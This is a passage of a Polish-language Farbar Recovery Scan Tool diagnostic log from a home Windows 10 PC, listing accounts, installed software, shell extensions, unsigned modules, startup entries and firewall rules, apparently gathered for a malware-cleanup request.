Rezultaty skanu uzupełniającego Farbar Recovery Scan Tool (x64) Wersja: 04-10-2021 Uruchomiony przez user (04-10-2021 13:51:04) Uruchomiony z C:\Users\user\Downloads Windows 10 Pro Wersja 21H1 19043.1165 (X64) (2021-02-23 14:37:54) Tryb startu: Normal ========================================================== ==================== Konta użytkowników: ============================= (Załączenie wejścia w fixlist spowoduje jego usunięcie.) Administrator (S-1-5-21-2979233212-3409670841-3564500532-500 - Administrator - Disabled) Gość (S-1-5-21-2979233212-3409670841-3564500532-501 - Limited - Disabled) kamil (S-1-5-21-2979233212-3409670841-3564500532-1003 - Limited - Disabled) Konto domyślne (S-1-5-21-2979233212-3409670841-3564500532-503 - Limited - Disabled) magda (S-1-5-21-2979233212-3409670841-3564500532-1002 - Limited - Disabled) user (S-1-5-21-2979233212-3409670841-3564500532-1001 - Administrator - Enabled) => C:\Users\user WDAGUtilityAccount (S-1-5-21-2979233212-3409670841-3564500532-504 - Limited - Disabled) ==================== Centrum zabezpieczeń ======================== (Załączenie wejścia w fixlist spowoduje jego usunięcie.) AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Zainstalowane programy ====================== (W fixlist dozwolone tylko załączanie programów adware z flagą "Hidden" w celu ich uwidocznienia. Programy adware powinny zostać w poprawny sposób odinstalowane.) AMD Chipset Software (HKLM-x32\...\AMD_Chipset_IODrivers) (Version: 2.13.27.501 - Advanced Micro Devices, Inc.) AMD Software (HKLM\...\AMD Catalyst Install Manager) (Version: 21.8.2 - Advanced Micro Devices, Inc.) AMD_Chipset_Drivers (HKLM-x32\...\{40c19864-e557-4855-95ee-075689dfcf8e}) (Version: 2.13.27.501 - Advanced Micro Devices, Inc.) Hidden AnyDesk (HKLM-x32\...\AnyDesk) (Version: ad 6.2.3 - philandro Software GmbH) Branding64 (HKLM\...\{C871FC62-0186-40ED-BAEA-7C65BE367755}) (Version: 1.00.0006 - Advanced Micro Devices, Inc.) Hidden CCleaner (HKLM\...\CCleaner) (Version: 5.84 - Piriform) Epic Games Launcher (HKLM-x32\...\{BE411926-37D4-45D5-9ED5-4132BEB8E9C5}) (Version: 1.1.298.0 - Epic Games, Inc.) Fraps (HKLM-x32\...\Fraps) (Version: - ) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 94.0.4606.71 - Google LLC) Kaspersky Total Security (HKLM-x32\...\{4FC79BE9-AD63-46C0-9626-E4F6BCE6A976}) (Version: 21.3.10.391 - Kaspersky) Hidden Kaspersky Total Security (HKLM-x32\...\InstallWIX_{4FC79BE9-AD63-46C0-9626-E4F6BCE6A976}) (Version: 21.3.10.391 - Kaspersky) Kaspersky VPN (HKLM-x32\...\{FF2A12B8-AEB7-48C0-95C8-E2E3D67DFCB2}) (Version: 21.3.10.391 - Kaspersky) Hidden Kaspersky VPN (HKLM-x32\...\InstallWIX_{FF2A12B8-AEB7-48C0-95C8-E2E3D67DFCB2}) (Version: 21.3.10.391 - Kaspersky) Krita (x64) 4.4.8 (HKLM\...\Krita_x64) (Version: 4.4.8.0 - Krita Foundation) Launcher Prerequisites (x64) (HKLM-x32\...\{43a03b9c-4770-409c-a999-587b60700b63}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden LogMeIn Hamachi (HKLM-x32\...\{ECC0FA07-863E-44BC-8B1D-DA22F96E5FB7}) (Version: 2.2.0.633 - LogMeIn, Inc.) Hidden LogMeIn Hamachi (HKLM-x32\...\LogMeIn Hamachi) (Version: 2.2.0.633 - LogMeIn, Inc.) Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 94.0.992.38 - Microsoft Corporation) Microsoft OneDrive (HKU\S-1-5-21-2979233212-3409670841-3564500532-1001\...\OneDriveSetup.exe) (Version: 21.170.0822.0002 - Microsoft Corporation) Microsoft Teams (HKU\S-1-5-21-2979233212-3409670841-3564500532-1001\...\Teams) (Version: 1.4.00.11161 - Microsoft Corporation) Opera GX Stable 79.0.4143.73 (HKU\S-1-5-21-2979233212-3409670841-3564500532-1001\...\Opera GX 79.0.4143.73) (Version: 79.0.4143.73 - Opera Software) paint.net (HKLM\...\{60B93D80-3659-429E-AA81-5C95A819F760}) (Version: 4.3.1 - dotPDN LLC) Promontory_GPIO Driver (HKLM-x32\...\{B5512BCC-F4CD-4159-86A4-B2AD7D38FFA9}) (Version: 2.0.1.0 - Advanced Micro Devices, Inc.) Hidden Razer Cortex (HKLM-x32\...\Razer Cortex_is1) (Version: 9.16.27.1472 - Razer Inc.) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7841 - Realtek Semiconductor Corp.) Remotr version 1.3.1469 (HKLM-x32\...\Remotr_is1) (Version: 1.3.1469 - RemoteMyApp sp. z o.o.) Revo Uninstaller Pro 4.4.8 (HKLM\...\{67579783-0FB7-4F7B-B881-E5BE47C9DBE0}_is1) (Version: 4.4.8 - VS Revo Group, Ltd.) Roblox Player (HKLM-x32\...\roblox-player-admin) (Version: - Roblox Corporation) Roblox Player for user (HKU\S-1-5-21-2979233212-3409670841-3564500532-1001\...\roblox-player) (Version: - Roblox Corporation) Roblox Studio (HKLM-x32\...\roblox-studio-admin) (Version: - Roblox Corporation) Roblox Studio for user (HKU\S-1-5-21-2979233212-3409670841-3564500532-1001\...\roblox-studio) (Version: - Roblox Corporation) RyzenMasterSDK (HKLM\...\{17BE94CF-FF53-4C12-81F5-E10EB6844849}) (Version: 1.2.3.5 - Advanced Micro Devices, Inc.) Hidden SHINOBI (HKLM-x32\...\{890CE702-97DD-4E48-BA65-863CC872CE4A}_is1) (Version: 1.0.4 - MODECOM Polska SP z o.o.) spacedesk Windows DRIVER (HKLM\...\{05747685-7932-4684-9E37-C87AD057AB5A}) (Version: 0.9.1101.0 - datronicsoft Inc.) Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation) UE Prerequisites (x64) (HKLM\...\{595B374E-CF48-4847-9A43-57DDF31FA0C5}) (Version: 1.0.14.0 - Epic Games, Inc.) Hidden UE4 Prerequisites (x64) (HKLM-x32\...\{932224d0-f414-4c86-b454-bfeaede3974c}) (Version: 1.0.14.0 - Epic Games, Inc.) Hidden VLC media player (HKLM\...\VLC media player) (Version: 3.0.16 - VideoLAN) WinRAR 6.02 (64-bitowy) (HKLM\...\WinRAR archiver) (Version: 6.02.0 - win.rar GmbH) X-Mouse Button Control 2.19.2 (HKLM-x32\...\X-Mouse Button Control) (Version: 2.19.2 - Highresolution Enterprises) Packages: ========= AMD Radeon™ Settings Lite -> C:\Program Files\WindowsApps\AdvancedMicroDevicesInc-2.59462344778C5_10.19.30008.0_x64__0a9344xs7nr4m [2021-02-24] (Advanced Micro Devices Inc.) Dodatek Aparat multimediów dla aplikacji Zdjęcia -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x64__8wekyb3d8bbwe [2020-10-18] (Microsoft Corporation) Dodatek Zdjęcia -> C:\Program Files\WindowsApps\Microsoft.Windows.Photos.DLC.Main_2021.39122.10110.0_x64__8wekyb3d8bbwe [2021-03-15] (Microsoft Corporation) Messenger -> C:\Program Files\WindowsApps\FACEBOOK.317180B0BB486_1220.6.117.0_x64__8xx8rvfyw5nnt [2021-09-18] (Facebook Inc) [Startup Task] OneDrive -> C:\Program Files\WindowsApps\microsoft.microsoftskydrive_19.23.11.0_x64__8wekyb3d8bbwe [2020-11-03] (Microsoft Corporation) Spotify Music -> C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.158.820.0_x86__zpdnekdrzrea0 [2021-05-02] (Spotify AB) [Startup Task] ==================== Niestandardowe rejestracje CLSID (filtrowane): ============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) CustomCLSID: HKU\S-1-5-21-2979233212-3409670841-3564500532-1001_Classes\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-2979233212-3409670841-3564500532-1001_Classes\CLSID\{00020421-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-2979233212-3409670841-3564500532-1001_Classes\CLSID\{00020422-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-2979233212-3409670841-3564500532-1001_Classes\CLSID\{00020423-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-2979233212-3409670841-3564500532-1001_Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-2979233212-3409670841-3564500532-1001_Classes\CLSID\{00020425-0000-0000-C000-000000000046}\InprocServer32 -> C:\WINDOWS\system32\oleaut32.dll (Microsoft Windows -> Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-2979233212-3409670841-3564500532-1001_Classes\CLSID\{04271989-C4D2-05A5-1D21-42E09A7303AA} -> [OneDrive - Szkoła Podstawowa nr 2] => C:\Users\user\OneDrive - Szkoła Podstawowa nr 2 [2020-11-03 09:12] CustomCLSID: HKU\S-1-5-21-2979233212-3409670841-3564500532-1001_Classes\CLSID\{19A6E644-14E6-4A60-B8D7-DD20610A871D}\InprocServer32 -> C:\Users\user\AppData\Local\Microsoft\TeamsMeetingAddin\1.0.21063.3\x64\Microsoft.Teams.AddinLoader.dll (Microsoft Corporation -> Microsoft Corporation) ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ContextMenuHandlers1: [Glary Utilities] -> {B3C418F8-922B-4faf-915E-59BC14448CF7} => -> Brak pliku ContextMenuHandlers1: [Kaspersky Anti-Virus 21.3] -> {37303E08-14C9-4FC3-B1D9-7993682A4691} => C:\Program Files (x86)\Kaspersky Lab\Kaspersky Total Security 21.3\x64\shellex.dll [2021-10-04] (Kaspersky Lab JSC -> AO Kaspersky Lab) ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2021-06-15] (win.rar GmbH -> Alexander Roshal) ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2021-06-15] (win.rar GmbH -> Alexander Roshal) ContextMenuHandlers2: [Glary Utilities] -> {B3C418F8-922B-4faf-915E-59BC14448CF7} => -> Brak pliku ContextMenuHandlers2: [Kaspersky Anti-Virus 21.3] -> {37303E08-14C9-4FC3-B1D9-7993682A4691} => C:\Program Files (x86)\Kaspersky Lab\Kaspersky Total Security 21.3\x64\shellex.dll [2021-10-04] (Kaspersky Lab JSC -> AO Kaspersky Lab) ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> Brak pliku ContextMenuHandlers4: [Kaspersky Anti-Virus 21.3] -> {37303E08-14C9-4FC3-B1D9-7993682A4691} => C:\Program Files (x86)\Kaspersky Lab\Kaspersky Total Security 21.3\x64\shellex.dll [2021-10-04] (Kaspersky Lab JSC -> AO Kaspersky Lab) ContextMenuHandlers4: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => -> Brak pliku ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\WINDOWS\System32\atiacm64.dll [2021-09-09] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc.) ContextMenuHandlers6: [Glary Utilities] -> {B3C418F8-922B-4faf-915E-59BC14448CF7} => -> Brak pliku ContextMenuHandlers6: [Kaspersky Anti-Virus 21.3] -> {37303E08-14C9-4FC3-B1D9-7993682A4691} => C:\Program Files (x86)\Kaspersky Lab\Kaspersky Total Security 21.3\x64\shellex.dll [2021-10-04] (Kaspersky Lab JSC -> AO Kaspersky Lab) ContextMenuHandlers6: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} => -> Brak pliku ContextMenuHandlers6: [RUShellExt] -> {2C5515DC-2A7E-4BFD-B813-CACC2B685EB7} => C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll [2020-09-28] (VS Revo Group Ltd. -> VS Revo Group) ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2021-06-15] (win.rar GmbH -> Alexander Roshal) ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2021-06-15] (win.rar GmbH -> Alexander Roshal) ==================== Codecs (filtrowane) ==================== (Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci. Powiązany plik nie zostanie przeniesiony.) HKLM\...\Drivers32: [VIDC.FPS1] => C:\WINDOWS\system32\frapsv64.dll [71680 2013-02-26] (Beepa P/L) [Brak podpisu cyfrowego] HKLM\...\Drivers32: [VIDC.FPS1] => C:\Windows\SysWOW64\frapsvid.dll [65536 2013-02-26] (Beepa P/L) [Brak podpisu cyfrowego] ==================== Skróty & WMI ======================== ==================== Załadowane moduły (filtrowane) ============= 2021-03-09 19:47 - 2021-03-09 19:47 - 000017920 ____C () [Brak podpisu cyfrowego] C:\Program Files\AMD\CNext\CNext\libEGL.dll 2021-03-09 19:47 - 2021-03-09 19:47 - 003567616 ____C () [Brak podpisu cyfrowego] C:\Program Files\AMD\CNext\CNext\libGLESv2.dll 2021-07-07 06:37 - 2021-07-07 06:37 - 000562688 ____C (Advanced Micro Devices) [Brak podpisu cyfrowego] C:\Program Files\AMD\CNext\CNext\Device.dll 2021-07-07 06:37 - 2021-07-07 06:37 - 000058880 ____C (Advanced Micro Devices) [Brak podpisu cyfrowego] C:\Program Files\AMD\CNext\CNext\Platform.dll 2021-08-24 18:38 - 2021-08-24 18:38 - 001704960 ____C (Advanced Micro Devices, Inc.) [Brak podpisu cyfrowego] C:\Program Files\AMD\WVR\OpenVR\bin\win64\driver_amdwvr.dll 2021-03-07 12:40 - 2016-06-22 21:54 - 001170432 _____ (Robert Simpson, et al.) [Brak podpisu cyfrowego] C:\Program Files (x86)\Remotr\x86\SQLite.Interop.dll 2021-03-09 19:47 - 2021-03-09 19:47 - 000031744 ____C (The Qt Company Ltd.) [Brak podpisu cyfrowego] C:\Program Files\AMD\CNext\CNext\plugins\imageformats\qgif.dll 2021-03-09 19:47 - 2021-03-09 19:47 - 000039424 ____C (The Qt Company Ltd.) [Brak podpisu cyfrowego] C:\Program Files\AMD\CNext\CNext\plugins\imageformats\qicns.dll 2021-03-09 19:47 - 2021-03-09 19:47 - 000031744 ____C (The Qt Company Ltd.) [Brak podpisu cyfrowego] C:\Program Files\AMD\CNext\CNext\plugins\imageformats\qico.dll 2021-03-09 19:47 - 2021-03-09 19:47 - 000414720 ____C (The Qt Company Ltd.) [Brak podpisu cyfrowego] C:\Program Files\AMD\CNext\CNext\plugins\imageformats\qjpeg.dll 2021-03-09 19:47 - 2021-03-09 19:47 - 000025088 ____C (The Qt Company Ltd.) [Brak podpisu cyfrowego] C:\Program Files\AMD\CNext\CNext\plugins\imageformats\qsvg.dll 2021-03-09 19:47 - 2021-03-09 19:47 - 000024576 ____C (The Qt Company Ltd.) [Brak podpisu cyfrowego] C:\Program Files\AMD\CNext\CNext\plugins\imageformats\qtga.dll 2021-03-09 19:47 - 2021-03-09 19:47 - 000023552 ____C (The Qt Company Ltd.) [Brak podpisu cyfrowego] C:\Program Files\AMD\CNext\CNext\plugins\imageformats\qwbmp.dll 2021-03-09 19:47 - 2021-03-09 19:47 - 000532992 ____C (The Qt Company Ltd.) [Brak podpisu cyfrowego] C:\Program Files\AMD\CNext\CNext\plugins\imageformats\qwebp.dll 2021-03-09 19:47 - 2021-03-09 19:47 - 001441792 ____C (The Qt Company Ltd.) [Brak podpisu cyfrowego] C:\Program Files\AMD\CNext\CNext\plugins\platforms\qwindows.dll 2021-03-09 19:47 - 2021-03-09 19:47 - 001189888 ____C (The Qt Company Ltd.) [Brak podpisu cyfrowego] C:\Program Files\AMD\CNext\CNext\plugins\sqldrivers\qsqlite.dll 2021-03-09 19:47 - 2021-03-09 19:47 - 000134656 ____C (The Qt Company Ltd.) [Brak podpisu cyfrowego] C:\Program Files\AMD\CNext\CNext\plugins\styles\qwindowsvistastyle.dll 2021-03-09 19:47 - 2021-03-09 19:47 - 006184448 ____C (The Qt Company Ltd.) [Brak podpisu cyfrowego] C:\Program Files\AMD\CNext\CNext\Qt5Core.dll 2021-03-09 19:47 - 2021-03-09 19:47 - 006867456 ____C (The Qt Company Ltd.) [Brak podpisu cyfrowego] C:\Program Files\AMD\CNext\CNext\Qt5Gui.dll 2021-03-09 19:47 - 2021-03-09 19:47 - 000735232 ____C (The Qt Company Ltd.) [Brak podpisu cyfrowego] C:\Program Files\AMD\CNext\CNext\Qt5Multimedia.dll 2021-03-09 19:47 - 2021-03-09 19:47 - 001104896 ____C (The Qt Company Ltd.) [Brak podpisu cyfrowego] C:\Program Files\AMD\CNext\CNext\Qt5Network.dll 2021-03-09 19:47 - 2021-03-09 19:47 - 000325120 ____C (The Qt Company Ltd.) [Brak podpisu cyfrowego] C:\Program Files\AMD\CNext\CNext\Qt5Positioning.dll 2021-03-09 19:47 - 2021-03-09 19:47 - 003668480 ____C (The Qt Company Ltd.) [Brak podpisu cyfrowego] C:\Program Files\AMD\CNext\CNext\Qt5Qml.dll 2021-03-09 19:47 - 2021-03-09 19:47 - 000517120 ____C (The Qt Company Ltd.) [Brak podpisu cyfrowego] C:\Program Files\AMD\CNext\CNext\Qt5QmlModels.dll 2021-03-09 19:47 - 2021-03-09 19:47 - 000051712 ____C (The Qt Company Ltd.) [Brak podpisu cyfrowego] C:\Program Files\AMD\CNext\CNext\Qt5QmlWorkerScript.dll 2021-03-09 19:47 - 2021-03-09 19:47 - 004228608 ____C (The Qt Company Ltd.) [Brak podpisu cyfrowego] C:\Program Files\AMD\CNext\CNext\Qt5Quick.dll 2021-03-09 19:47 - 2021-03-09 19:47 - 000171008 ____C (The Qt Company Ltd.) [Brak podpisu cyfrowego] C:\Program Files\AMD\CNext\CNext\Qt5QuickControls2.dll 2021-03-09 19:47 - 2021-03-09 19:47 - 001085440 ____C (The Qt Company Ltd.) [Brak podpisu cyfrowego] C:\Program Files\AMD\CNext\CNext\Qt5QuickTemplates2.dll 2021-03-09 19:47 - 2021-03-09 19:47 - 000480256 ____C (The Qt Company Ltd.) [Brak podpisu cyfrowego] C:\Program Files\AMD\CNext\CNext\Qt5RemoteObjects.dll 2021-03-09 19:47 - 2021-03-09 19:47 - 000205824 ____C (The Qt Company Ltd.) [Brak podpisu cyfrowego] C:\Program Files\AMD\CNext\CNext\Qt5Sql.dll 2021-03-09 19:47 - 2021-03-09 19:47 - 000329728 ____C (The Qt Company Ltd.) [Brak podpisu cyfrowego] C:\Program Files\AMD\CNext\CNext\Qt5Svg.dll 2021-03-09 19:47 - 2021-03-09 19:47 - 000127488 ____C (The Qt Company Ltd.) [Brak podpisu cyfrowego] C:\Program Files\AMD\CNext\CNext\Qt5WebChannel.dll 2021-03-09 19:47 - 2021-03-09 19:47 - 000390656 ____C (The Qt Company Ltd.) [Brak podpisu cyfrowego] C:\Program Files\AMD\CNext\CNext\Qt5WebEngine.dll 2021-03-09 19:47 - 2021-03-09 19:47 - 095598080 ____C (The Qt Company Ltd.) [Brak podpisu cyfrowego] C:\Program Files\AMD\CNext\CNext\Qt5WebEngineCore.dll 2021-03-09 19:47 - 2021-03-09 19:47 - 005587968 ____C (The Qt Company Ltd.) [Brak podpisu cyfrowego] C:\Program Files\AMD\CNext\CNext\Qt5Widgets.dll 2021-03-09 19:47 - 2021-03-09 19:47 - 000462848 ____C (The Qt Company Ltd.) [Brak podpisu cyfrowego] C:\Program Files\AMD\CNext\CNext\Qt5WinExtras.dll 2021-03-09 19:47 - 2021-03-09 19:47 - 000188928 ____C (The Qt Company Ltd.) [Brak podpisu cyfrowego] C:\Program Files\AMD\CNext\CNext\Qt5Xml.dll 2021-03-09 19:47 - 2021-03-09 19:47 - 002878464 ____C (The Qt Company Ltd.) [Brak podpisu cyfrowego] C:\Program Files\AMD\CNext\CNext\Qt5XmlPatterns.dll 2021-03-09 19:47 - 2021-03-09 19:47 - 000055808 ____C (The Qt Company Ltd.) [Brak podpisu cyfrowego] C:\Program Files\AMD\CNext\CNext\QtGraphicalEffects\private\qtgraphicaleffectsprivate.dll 2021-03-09 19:47 - 2021-03-09 19:47 - 000059392 ____C (The Qt Company Ltd.) [Brak podpisu cyfrowego] C:\Program Files\AMD\CNext\CNext\QtGraphicalEffects\qtgraphicaleffectsplugin.dll 2021-03-09 19:47 - 2021-03-09 19:47 - 000017920 ____C (The Qt Company Ltd.) [Brak podpisu cyfrowego] C:\Program Files\AMD\CNext\CNext\QtQml\qmlplugin.dll 2021-03-09 19:47 - 2021-03-09 19:47 - 000017920 ____C (The Qt Company Ltd.) [Brak podpisu cyfrowego] C:\Program Files\AMD\CNext\CNext\QtQuick.2\qtquick2plugin.dll 2021-03-09 19:47 - 2021-03-09 19:47 - 000284160 ____C (The Qt Company Ltd.) [Brak podpisu cyfrowego] C:\Program Files\AMD\CNext\CNext\QtQuick\Controls.2\qtquickcontrols2plugin.dll 2021-03-09 19:47 - 2021-03-09 19:47 - 000333824 ____C (The Qt Company Ltd.) [Brak podpisu cyfrowego] C:\Program Files\AMD\CNext\CNext\QtQuick\Controls\qtquickcontrolsplugin.dll 2021-03-09 19:47 - 2021-03-09 19:47 - 000136704 ____C (The Qt Company Ltd.) [Brak podpisu cyfrowego] C:\Program Files\AMD\CNext\CNext\QtQuick\Dialogs\dialogplugin.dll 2021-03-09 19:47 - 2021-03-09 19:47 - 000090112 ____C (The Qt Company Ltd.) [Brak podpisu cyfrowego] C:\Program Files\AMD\CNext\CNext\QtQuick\Layouts\qquicklayoutsplugin.dll 2021-03-09 19:47 - 2021-03-09 19:47 - 000313856 ____C (The Qt Company Ltd.) [Brak podpisu cyfrowego] C:\Program Files\AMD\CNext\CNext\QtQuick\Templates.2\qtquicktemplates2plugin.dll 2021-03-09 19:47 - 2021-03-09 19:47 - 000017920 ____C (The Qt Company Ltd.) [Brak podpisu cyfrowego] C:\Program Files\AMD\CNext\CNext\QtQuick\Window.2\windowplugin.dll 2021-03-09 19:47 - 2021-03-09 19:47 - 000091648 ____C (The Qt Company Ltd.) [Brak podpisu cyfrowego] C:\Program Files\AMD\CNext\CNext\QtWebEngine\qtwebengineplugin.dll ==================== Alternate Data Streams (filtrowane) ======== (Załączenie wejścia w fixlist spowoduje usunięcie strumienia ADS.) AlternateDataStreams: C:\desktop.ini:CachedTiles [7006] AlternateDataStreams: C:\WINDOWS\system32\Drivers\evfjqzeq.sys:changelist [734] AlternateDataStreams: C:\WINDOWS\system32\Drivers\rbevkjid.sys:changelist [326] AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [4768] ==================== Tryb awaryjny (filtrowane) ================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Wartość "AlternateShell" zostanie przywrócona.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Hamachi2Svc => ""="Service" ==================== Powiązania plików (filtrowane) ================= ==================== Internet Explorer (filtrowane) ========== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru.) IE trusted site: HKU\S-1-5-21-2979233212-3409670841-3564500532-1001\...\sharepoint.com -> hxxps://sp2pelplin-files.sharepoint.com ==================== Hosts - zawartość: ========================= (Użycie dyrektywy Hosts: w fixlist spowoduje reset pliku Hosts.) 2019-03-19 06:49 - 2021-10-02 20:55 - 000000000 ____C C:\WINDOWS\system32\drivers\etc\hosts 2021-01-29 12:31 - 2021-03-19 12:23 - 000000446 ____C C:\WINDOWS\system32\drivers\etc\hosts.ics 69.254.52.151 DESKTOP-666FM5T.mshome.net # 2026 1 3 28 10 31 58 300 ==================== Inne obszary =========================== (Obecnie brak automatycznej naprawy dla tej sekcji.) HKU\S-1-5-21-2979233212-3409670841-3564500532-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\user\Downloads\Fall_Guys_9__wynik.jpg DNS Servers: 192.168.0.1 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: ) Zapora systemu Windows [funkcja włączona] ==================== MSCONFIG/TASK MANAGER - Wyłączone elementy == (Załączenie wejścia w fixlist spowoduje jego usunięcie.) HKLM\...\StartupApproved\StartupFolder: => "AnyDesk.lnk" HKLM\...\StartupApproved\Run: => "SecurityHealth" HKLM\...\StartupApproved\Run: => "RTHDVCPL" HKLM\...\StartupApproved\Run: => "XMouseButtonControl" HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched" HKLM\...\StartupApproved\Run32: => "Discord" HKLM\...\StartupApproved\Run32: => "LogMeIn Hamachi Ui" HKLM\...\StartupApproved\Run32: => "PWRISOVM.EXE" HKLM\...\StartupApproved\Run32: => "BokangSpeedup" HKU\S-1-5-21-2979233212-3409670841-3564500532-1001\...\StartupApproved\StartupFolder: => "Wysyłanie do programu OneNote.lnk" HKU\S-1-5-21-2979233212-3409670841-3564500532-1001\...\StartupApproved\StartupFolder: => "startpa.bat" HKU\S-1-5-21-2979233212-3409670841-3564500532-1001\...\StartupApproved\StartupFolder: => "MEGAsync.lnk" HKU\S-1-5-21-2979233212-3409670841-3564500532-1001\...\StartupApproved\Run: => "OneDrive" HKU\S-1-5-21-2979233212-3409670841-3564500532-1001\...\StartupApproved\Run: => "EpicGamesLauncher" HKU\S-1-5-21-2979233212-3409670841-3564500532-1001\...\StartupApproved\Run: => "Steam" HKU\S-1-5-21-2979233212-3409670841-3564500532-1001\...\StartupApproved\Run: => "com.squirrel.Teams.Teams" HKU\S-1-5-21-2979233212-3409670841-3564500532-1001\...\StartupApproved\Run: => "CCleaner Smart Cleaning" HKU\S-1-5-21-2979233212-3409670841-3564500532-1001\...\StartupApproved\Run: => "Opera GX Browser Assistant" HKU\S-1-5-21-2979233212-3409670841-3564500532-1001\...\StartupApproved\Run: => "chrome.exe" HKU\S-1-5-21-2979233212-3409670841-3564500532-1001\...\StartupApproved\Run: => "Mem Reduct" HKU\S-1-5-21-2979233212-3409670841-3564500532-1001\...\StartupApproved\Run: => "Display" ==================== Reguły Zapory systemu Windows (filtrowane) ================ (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) FirewallRules: [{62429F56-DD58-44EE-BAD8-0C6C6730EAAF}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve -> Valve Corporation) FirewallRules: [{0B6730FE-5415-4DED-898A-1D4C52B5B1FA}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve -> Valve Corporation) FirewallRules: [{F2E344F4-76B8-4015-A1EB-D7A8A269E4A2}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.68.96.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.) FirewallRules: [{48793049-38C1-4FA7-B24B-0AFA410A41E6}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.68.96.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.) FirewallRules: [{F2A222C6-2328-49DD-83DB-99BF141EBB18}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.68.96.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.) FirewallRules: [{FFE86810-0BED-475D-B5D6-DC187358C8B5}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.68.96.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.) FirewallRules: [UDP Query User{CEFF13D6-DBE9-4ABC-A790-5149A7A035E6}C:\users\user\appdata\local\microsoft\teams\current\teams.exe] => (Allow) C:\users\user\appdata\local\microsoft\teams\current\teams.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [TCP Query User{69DBEEF0-5A07-44B5-B17F-B0FEA98059CF}C:\users\user\appdata\local\microsoft\teams\current\teams.exe] => (Allow) C:\users\user\appdata\local\microsoft\teams\current\teams.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [{2FFECFBE-CFAB-4300-B55E-D7BD13B64491}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe (Valve -> Valve Corporation) FirewallRules: [{8538B028-9E14-41A2-BF8B-FE1AF294D8BC}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe (Valve -> Valve Corporation) FirewallRules: [{C3482D0E-D1BF-49AF-BE9A-75E60141BDBB}] => (Allow) C:\Program Files\txgameassistant\appmarket\DL\syzs_dl_svr.exe (Tencent Technology(Shenzhen) Company Limited -> ) FirewallRules: [{E4F5BFFA-9238-44B6-B438-828E2A8181AE}] => (Allow) 